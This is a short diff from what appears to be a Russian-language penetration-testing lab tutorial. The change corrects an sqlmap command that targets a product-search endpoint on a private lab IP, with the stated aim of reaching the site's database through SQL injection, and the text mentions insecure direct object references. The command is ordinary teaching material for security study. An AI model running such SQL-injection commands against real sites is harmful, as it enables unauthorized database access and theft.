@ -420,7 +420,7 @@ mysite.ru/read_message.jsp?id=123654
В данном случае присутствует незащищённая ссылка или *прямой доступ к объектам*. Попробуем получить доступ к Базе данных данного сайта. Для этого необходимо запустить программу sqlmap при помощи команды
```ssh
python -u http://10.5.143.101:PORT/rest/products/search?q= --level=3 --risk=3
python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --level=3 --risk=3
```
Если возникнет вопрос про WAF/IPS/IDS – отвечаем N.
